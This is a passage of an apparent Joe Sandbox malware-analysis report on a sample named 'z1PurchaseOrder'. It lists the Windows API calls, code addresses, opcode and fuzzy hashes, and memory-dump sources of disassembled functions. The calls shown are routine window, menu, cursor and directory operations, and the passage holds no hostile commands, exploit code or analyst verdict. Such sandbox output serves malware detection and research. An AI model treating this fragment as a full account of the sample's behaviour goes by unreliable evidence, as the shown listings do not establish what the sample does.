                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Window$EnumForegroundWindows_wcslen$ChildDesktop
                                        • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                        • API String ID: 1322021666-1919597938
                                        • Opcode ID: f0ae0bd5c84c8fbd9fa80e8b17a650ade3f6139d63811c55da114ce2128ba9af
                                        • Instruction ID: 252cd24da08a8cddfda52e39780f3f39bafd894638fb43d2866a45805a666b3e
                                        • Opcode Fuzzy Hash: f0ae0bd5c84c8fbd9fa80e8b17a650ade3f6139d63811c55da114ce2128ba9af
                                        • Instruction Fuzzy Hash: 96F1C571D143409BCB00EF61C881EAB73A4BF95308F44496FF9456B286E77DE909CB6A
                                        APIs
                                        • GetLocalTime.KERNEL32(?), ref: 0045DED4
                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 0045DEE4
                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0045DEF0
                                        • _wcsncpy.LIBCMT ref: 0045DF0F
                                        • __wsplitpath.LIBCMT ref: 0045DF54
                                        • _wcscat.LIBCMT ref: 0045DF6C
                                        • _wcscat.LIBCMT ref: 0045DF7E
                                        • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0045DF93
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0045DFA7
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0045DFE5
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0045DFFB
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0045E00D
                                        • _wcscpy.LIBCMT ref: 0045E019
                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0045E05F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: CurrentDirectory$Time$File$Local_wcscat$System__wsplitpath_wcscpy_wcsncpy
                                        • String ID: *.*
                                        • API String ID: 3201719729-438819550
                                        • Opcode ID: 89541da3f554ebb8d42e95f45bc66f31ca584aff69b040987f949bd9346ecb30
                                        • Instruction ID: 9ef8ac46b2ec3f8a2b66e183c5d6435db2730cdd54c1860218fefef83dfd89d7
                                        • Opcode Fuzzy Hash: 89541da3f554ebb8d42e95f45bc66f31ca584aff69b040987f949bd9346ecb30
                                        • Instruction Fuzzy Hash: D061A7B25043049BC724EF65C881E9FB3E8AF94704F048E1EF98987241DB79E949CB96
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: __wcsicoll$IconLoad
                                        • String ID: blank$info$question$stop$warning
                                        • API String ID: 2485277191-404129466
                                        • Opcode ID: 5bed60ec3368b378429e4d7d86c3e9ed6cb6a0c6f582f3c961ebbe10ae210b10
                                        • Instruction ID: 3fdcc892c2a25cebf9aff257507665a297d4e16c4260cb8f6e9492a672fb13e0
                                        • Opcode Fuzzy Hash: 5bed60ec3368b378429e4d7d86c3e9ed6cb6a0c6f582f3c961ebbe10ae210b10
                                        • Instruction Fuzzy Hash: CB2128B6B08301A7D610A725BC05FDF27489FA8365F004C2BF941E2283F3A8A45583BD
                                        APIs
                                        • CompareStringW.KERNEL32(?,?,004832AC,00000001,004832AC,00000001), ref: 00428611
                                        • GetLastError.KERNEL32(?,?,004832AC,00000001,004832AC,00000001), ref: 00428627
                                        • strncnt.LIBCMT ref: 00428646
                                        • strncnt.LIBCMT ref: 0042865A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: strncnt$CompareErrorLastString
                                        • String ID:
                                        • API String ID: 1776594460-0
                                        • Opcode ID: 16ce8c3a65625fd7540c51b5c1254bfa478756f7f63d0819a38d9cd03b2976a4
                                        • Instruction ID: 056e5a993d73ec50dc3c8e072878bb631c9b69e1f80941a2a69bbd8adeb14d7f
                                        • Opcode Fuzzy Hash: 16ce8c3a65625fd7540c51b5c1254bfa478756f7f63d0819a38d9cd03b2976a4
                                        • Instruction Fuzzy Hash: 0DA1B131B01225AFDF219F61EC41AAF7BB6AF94340FA4402FF81196251DF3D8891CB58
                                        APIs
                                        • LoadIconW.USER32(?,00000063), ref: 004545DA
                                        • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 004545EC
                                        • SetWindowTextW.USER32(?,?), ref: 00454606
                                        • GetDlgItem.USER32(?,000003EA), ref: 0045461F
                                        • SetWindowTextW.USER32(00000000,?), ref: 00454626
                                        • GetDlgItem.USER32(?,000003E9), ref: 00454637
                                        • SetWindowTextW.USER32(00000000,?), ref: 0045463E
                                        • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00454663
                                        • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 0045467D
                                        • GetWindowRect.USER32(?,?), ref: 00454688
                                        • SetWindowTextW.USER32(?,?), ref: 004546FD
                                        • GetDesktopWindow.USER32 ref: 00454708
                                        • GetWindowRect.USER32(00000000), ref: 0045470F
                                        • MoveWindow.USER32(?,?,00000000,?,?,00000000), ref: 00454760
                                        • GetClientRect.USER32(?,?), ref: 0045476F
                                        • PostMessageW.USER32(?,00000005,00000000,?), ref: 0045479E
                                        • SetTimer.USER32(?,0000040A,?,00000000), ref: 004547E9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                        • String ID:
                                        • API String ID: 3869813825-0
                                        • Opcode ID: d6d25c813e590b752cbfd9858452ff05e3d443d6a6ce6916d89e520ab15b373f
                                        • Instruction ID: 4e77de65cc6986e78e6be143d0a4b9e7f39e78804b6f4fc71fe9e35dfcfd5046
                                        • Opcode Fuzzy Hash: d6d25c813e590b752cbfd9858452ff05e3d443d6a6ce6916d89e520ab15b373f
                                        • Instruction Fuzzy Hash: 8C616D71604701AFD320DF68CD88F2BB7E8AB88709F004E1DF98697691D7B8E849CB55
                                        APIs
                                        • LoadCursorW.USER32(00000000,00007F8A), ref: 00458D2D
                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00458D3A
                                        • LoadCursorW.USER32(00000000,00007F03), ref: 00458D47
                                        • LoadCursorW.USER32(00000000,00007F8B), ref: 00458D54
                                        • LoadCursorW.USER32(00000000,00007F01), ref: 00458D61
                                        • LoadCursorW.USER32(00000000,00007F81), ref: 00458D6E
                                        • LoadCursorW.USER32(00000000,00007F88), ref: 00458D7B
                                        • LoadCursorW.USER32(00000000,00007F80), ref: 00458D88
                                        • LoadCursorW.USER32(00000000,00007F86), ref: 00458D95
                                        • LoadCursorW.USER32(00000000,00007F83), ref: 00458DA2
                                        • LoadCursorW.USER32(00000000,00007F85), ref: 00458DAF
                                        • LoadCursorW.USER32(00000000,00007F82), ref: 00458DBC
                                        • LoadCursorW.USER32(00000000,00007F84), ref: 00458DC9
                                        • LoadCursorW.USER32(00000000,00007F04), ref: 00458DD6
                                        • LoadCursorW.USER32(00000000,00007F02), ref: 00458DE3
                                        • LoadCursorW.USER32(00000000,00007F89), ref: 00458DF0
                                        • GetCursorInfo.USER32 ref: 00458E03
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Cursor$Load$Info
                                        • String ID:
                                        • API String ID: 2577412497-0
                                        • Opcode ID: 0c78b259ae472df09145ddf792cd37f85d2c816b82f1d484569203a38ef646a1
                                        • Instruction ID: 36b4ee280ed0253346847529aeb00c95e660e1b7f2a6688567eec4957a26740b
                                        • Opcode Fuzzy Hash: 0c78b259ae472df09145ddf792cd37f85d2c816b82f1d484569203a38ef646a1
                                        • Instruction Fuzzy Hash: D9311671E4C3156AE7509F758C5AB1BBEE0AF40B54F004D2FF2889F2D1DAB9E4448B86
                                        APIs
                                        • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 004696CC
                                        • GetFocus.USER32 ref: 004696E0
                                        • GetDlgCtrlID.USER32(00000000), ref: 004696EB
                                        • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046973F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: MessagePost$CtrlFocus
                                        • String ID: 0
                                        • API String ID: 1534620443-4108050209
                                        • Opcode ID: 3dab727c688772619e9efc5d23afb6fcae73775eddc560d175f3e695e52b8611
                                        • Instruction ID: 7d80af5808d25915b866e76daf530f36ef8b085de22dc1c7fc8dbb607ae8adb7
                                        • Opcode Fuzzy Hash: 3dab727c688772619e9efc5d23afb6fcae73775eddc560d175f3e695e52b8611
                                        • Instruction Fuzzy Hash: 1591E1B1604301ABD710DF14D884BABB7A8FB89714F004A1EF99497391E7B4DC49CBAB
                                        APIs
                                        • _memset.LIBCMT ref: 00468107
                                        • GetMenuItemInfoW.USER32(?,00000007,00000000,?), ref: 00468190
                                        • GetMenuItemCount.USER32(?), ref: 00468227
                                        • DeleteMenu.USER32(?,00000005,00000000), ref: 004682B8
                                        • DeleteMenu.USER32(?,00000004,00000000), ref: 004682C1
                                        • DeleteMenu.USER32(?,00000006,00000000,?,00000004,00000000), ref: 004682CA
                                        • DeleteMenu.USER32(00000000,00000003,00000000,?,00000006,00000000,?,00000004,00000000), ref: 004682D3
                                        • GetMenuItemCount.USER32 ref: 004682DC
                                        • SetMenuItemInfoW.USER32 ref: 00468317
                                        • GetCursorPos.USER32(00000000), ref: 00468322
                                        • SetForegroundWindow.USER32(?), ref: 0046832D
                                        • TrackPopupMenuEx.USER32(?,00000000,00000000,00000006,?,00000000,?,?,00000006,00000000,?,00000004,00000000), ref: 00468345
                                        • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468352
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                        • String ID: 0
                                        • API String ID: 3993528054-4108050209
                                        • Opcode ID: d5573be1ba1a613c106f8e764602a2d45d8b266f51cd1eb04f60dea375430468
                                        • Instruction ID: a450cccb4b36e122d1eca3afa35c85d1e57e2007e4dd5bc50ce81cada7f4397f
                                        • Opcode Fuzzy Hash: d5573be1ba1a613c106f8e764602a2d45d8b266f51cd1eb04f60dea375430468
                                        • Instruction Fuzzy Hash: 3C71C070648301ABE3309B14CC49F5BB7E8BF86724F244B0EF5A5563D1DBB9A8458B1B
                                        APIs
                                        • DragQueryPoint.SHELL32(?,?), ref: 0046F2DA
                                          • Part of subcall function 00441CB4: ClientToScreen.USER32(00000000,?), ref: 00441CDE
                                          • Part of subcall function 00441CB4: GetWindowRect.USER32(?,?), ref: 00441D5A
                                          • Part of subcall function 00441CB4: PtInRect.USER32(?,?,?), ref: 00441D6F
                                        • SendMessageW.USER32(?), ref: 0046F34C
                                        • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0046F355
                                        • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0046F37F
                                        • _wcscat.LIBCMT ref: 0046F3BC
                                        • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0046F3D1
                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 0046F3E3
                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 0046F3F1
                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 0046F40E
                                        • DragFinish.SHELL32(?), ref: 0046F414
                                        • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0046F4FC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: MessageSend$Drag$Query$FileRect$ClientFinishPointProcScreenWindow_wcscat
                                        • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                        • API String ID: 4085615965-3440237614
                                        • Opcode ID: e6dc8860684545ee98a9b737372e313d8034606243f87d3f07a4344f64e9a130
                                        • Instruction ID: d92027b63b9478c52a8b17f069484fb886a707b260a555cedefccfc898d4b85d
                                        • Opcode Fuzzy Hash: e6dc8860684545ee98a9b737372e313d8034606243f87d3f07a4344f64e9a130
                                        • Instruction Fuzzy Hash: 596170716043009BD700EF54D885E5FB7A8FFC9714F104A2EF99097291D7B8A949CBAA
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: __wcsicoll
                                        • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                                        • API String ID: 3832890014-4202584635
                                        • Opcode ID: 3f0b73fdde0a53fb0a00575eab05b85141dd4a2dcfcc4ab19f269ee93bd0b8a8
                                        • Instruction ID: bf73cd225697d97a5a257e466bf5c8c79b4efa22739c650e03c6b1f9c6e9338c
                                        • Opcode Fuzzy Hash: 3f0b73fdde0a53fb0a00575eab05b85141dd4a2dcfcc4ab19f269ee93bd0b8a8
                                        • Instruction Fuzzy Hash: 1D01616160562122FE11322A7C03BDF15898F5139AF14447BFC05F1282FF4DDA8692EE
                                        APIs
                                        • _memset.LIBCMT ref: 004669C4
                                        • _wcsncpy.LIBCMT ref: 00466A21
                                        • _wcsncpy.LIBCMT ref: 00466A4D
                                          • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                          • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                        • _wcstok.LIBCMT ref: 00466A90
                                          • Part of subcall function 004142A3: __getptd.LIBCMT ref: 004142A9
                                        • _wcstok.LIBCMT ref: 00466B3F
                                        • _wcscpy.LIBCMT ref: 00466BC8
                                        • GetOpenFileNameW.COMDLG32(00000058), ref: 00466CFE
                                        • _wcslen.LIBCMT ref: 00466D1D
                                        • _memset.LIBCMT ref: 00466BEE
                                          • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                        • _wcslen.LIBCMT ref: 00466D4B
                                        • GetSaveFileNameW.COMDLG32(00000058), ref: 00466D9E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: _wcslen$FileName_memset_wcscpy_wcsncpy_wcstok$OpenSave__getptd
                                        • String ID: X$HH
                                        • API String ID: 3021350936-1944015008
                                        • Opcode ID: b06cb37d3db4ad53d3a41f94d3d7a052046d00add24c9c6de48b5fd017d77e84
                                        • Instruction ID: 73e83d7ea4d12cbe09e247b0b8120e99e9ae8af51722f6ce2f45a1bbad6557a4
                                        • Opcode Fuzzy Hash: b06cb37d3db4ad53d3a41f94d3d7a052046d00add24c9c6de48b5fd017d77e84
                                        • Instruction Fuzzy Hash: D1C1B2715043408BC714EF65C981A9FB3E4BF84304F15892FF949AB292EB78E905CB9B
                                        APIs
                                        • _memset.LIBCMT ref: 0045F4AE
                                        • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0045F519
                                        • SetMenuItemInfoW.USER32(00000008,00000004,00000000,?), ref: 0045F556
                                        • Sleep.KERNEL32(000001F4,?,?,00000000,?), ref: 0045F568
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: InfoItemMenu$Sleep_memset
                                        • String ID: 0
                                        • API String ID: 1504565804-4108050209
                                        • Opcode ID: b2eb264578549714347dca4c6cc1c63db220fd8d89572d1a81e0d1d82c6caf25
                                        • Instruction ID: 9e8996cb251b45e9fd8013479734a73363ce4640cf951279a7d2fdadd0934edb
                                        • Opcode Fuzzy Hash: b2eb264578549714347dca4c6cc1c63db220fd8d89572d1a81e0d1d82c6caf25
                                        • Instruction Fuzzy Hash: E171E3711043406BD3109F54DD48FABBBE8EBD5306F04086FFD8587252D6B9A94EC76A
                                        APIs
                                        • DestroyWindow.USER32(?,004A83D8,?), ref: 00455800
                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 00455847
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Window$CreateDestroy
                                        • String ID: ,$tooltips_class32
                                        • API String ID: 1109047481-3856767331
                                        • Opcode ID: 0ca5ab61cf6a2cad142a114e1c8ac043728d1bef212d4075191e352a737c6d07
                                        • Instruction ID: af4df8b80438f92fd5356fe82daba85812243c44dff517d7eb602cf52e2cfce3
                                        • Opcode Fuzzy Hash: 0ca5ab61cf6a2cad142a114e1c8ac043728d1bef212d4075191e352a737c6d07
                                        • Instruction Fuzzy Hash: BF719075244704AFE320DB28CC85F7B77E4EB89700F50491EFA8197391E6B5E905CB59
                                        APIs
                                        • _wcsncpy.LIBCMT ref: 0045CCFA
                                        • __wsplitpath.LIBCMT ref: 0045CD3C
                                        • _wcscat.LIBCMT ref: 0045CD51
                                        • _wcscat.LIBCMT ref: 0045CD63
                                        • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,00000104,?), ref: 0045CD78
                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,00000104,?), ref: 0045CD8C
                                          • Part of subcall function 00436AC4: GetFileAttributesW.KERNEL32(?,0044BD82,?,?,?), ref: 00436AC9
                                        • GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CDD0
                                        • SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CDE6
                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CDF8
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0045CE08
                                        • _wcscpy.LIBCMT ref: 0045CE14
                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CE5A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: CurrentDirectory$AttributesFile$_wcscat$__wsplitpath_wcscpy_wcsncpy
                                        • String ID: *.*
                                        • API String ID: 1153243558-438819550
                                        • Opcode ID: 5bfa431d4ef7075d2dc920e4199facb1e2714bc7465ef22df03346902ac9b5e5
                                        • Instruction ID: 4b7f18f3392d5c51d0b0bcfc25b88d1348604f1c1aa494fd035d881d108a9fe9
                                        • Opcode Fuzzy Hash: 5bfa431d4ef7075d2dc920e4199facb1e2714bc7465ef22df03346902ac9b5e5
                                        • Instruction Fuzzy Hash: 0561E5B61043419FD731EF54C885AEBB7E4EB84305F44882FED8983242D67D998E879E
                                        APIs
                                        • _memset.LIBCMT ref: 00455127
                                        • GetMenuItemInfoW.USER32 ref: 00455146
                                        • DeleteMenu.USER32(?,?,00000000), ref: 004551B2
                                        • DeleteMenu.USER32(?,?,00000000), ref: 004551C8
                                        • GetMenuItemCount.USER32(?), ref: 004551D9
                                        • SetMenu.USER32(?,00000000), ref: 004551E7
                                        • DestroyMenu.USER32(?,?,00000000), ref: 004551F4
                                        • DrawMenuBar.USER32 ref: 00455207
                                        • DeleteObject.GDI32(?), ref: 0045564E
                                        • DeleteObject.GDI32(?), ref: 0045565C
                                        • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                        • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
